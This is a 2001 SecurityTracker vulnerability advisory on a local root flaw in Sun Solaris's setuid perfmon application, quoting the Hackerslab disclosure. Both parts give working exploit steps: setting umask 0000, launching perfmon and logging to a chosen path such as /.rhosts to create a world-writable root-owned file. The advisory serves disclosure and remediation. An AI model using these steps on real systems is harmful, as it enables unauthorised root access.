SecurityTracker: Sun Solaris Perfmon Application Can Create Files with Root-Level Privileges

	Keep Track of the Latest Vulnerabilities with SecurityTracker!

Home | View Topics | Search | Contact Us |

SecurityTracker
Archives

Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary

Instant Alerts

Buy our Premium Vulnerability Notification Service to receive customized, instant alerts

Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!

Become a Partner and License Our Database or Notification Service

Report a Bug

Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com

Category: Application (Generic) > Perfmon

Sun Solaris Perfmon Application Can Create Files with Root-Level Privileges

SecurityTracker Alert ID: 1001144

SecurityTracker URL: http://securitytracker.com/id/1001144

CVE Reference: GENERIC-MAP-NOMATCH (Links to External Site)

Date: Mar 23 2001

Impact: Modification of system information, Root access via local system

Exploit Included: Yes

Description: Hackerslab reports a vulnerability in the "perfmon" application for Sun Solaris. The application (/opt/JSParm/bin/perfmon), which is used to display system information, can create files on the server with root-level permissions.

By using the logging feature of perfmon, a local user can cause perfmon to create files with root-level privileges on the server.

The author of the source message indicates the following exploit steps:

$ whoami
loveyou
$ umask 0000
$ /opt/JSparm/bin/perfmon &

Choose "Logging -> Logging File". In the "Selection" part, input the file path you want to create, such as "/.rhosts". The following file will be created:

-rw-rw-rw- 1 root loveyou 144 Mar 9 03:14 .rhost

Impact: A local user can create files on the server with root-level permissions. This could readily lead to root-level access to the server.

Solution: No solution was available at the time of this entry. The author of the source message recommends that you remove setuid permission for perfmon.

Vendor URL: www.sun.com (Links to External Site)

Cause: Access control error

Underlying OS: UNIX (Solaris - SunOS)

Message History: None.

Source Message Contents

Date: Fri, 23 Mar 2001 17:11:52 +0900
Subject: [ Hackerslab bug_paper ] SunOS application perfmon vulnerability


==============================================================================

       [ Hackerslab bug_paper ] SunOS application perfmon vulnerability

==============================================================================

File   :   /opt/JSParm/bin/perfmon

SYSTEM : Solaris 2.X

INFO :

parm is a program that displays system information .
parm is SunOS application.  It's  not included in Solaris basic package.

There is a vulneribility in perfmon program that you can create
any file with root privilege as follow:

$ whoami
loveyou
$ umask 0000
$ /opt/JSparm/bin/perfmon &


Choose Logging -> Logging File
In Selection part, input the file path you want to create
ex:) /.rhosts

following file is created in a second.
-rw-rw-rw-   1 root     loveyou         144 Mar  9 03:14 .rhost


SOLUTION :

remove setuid permition, contact your vendor and get a patch.



==-------------------------------------------------------------------------------==
       ********
   *    **   **    *
 *      **   **      *
*       ******       *
 *      **   **      *                                     loveyou@hackerslab.org
   *    **   **    *                                 [  http://www.hackerslab.org ]
       ********            HACKERSLAB (C)  since 1999
==-------------------------------------------------------------------------------==

Go to the Top of This SecurityTracker Archive Page

Home | View Topics | Search | Contact Us
Copyright 2012, SecurityGlobal.net LLC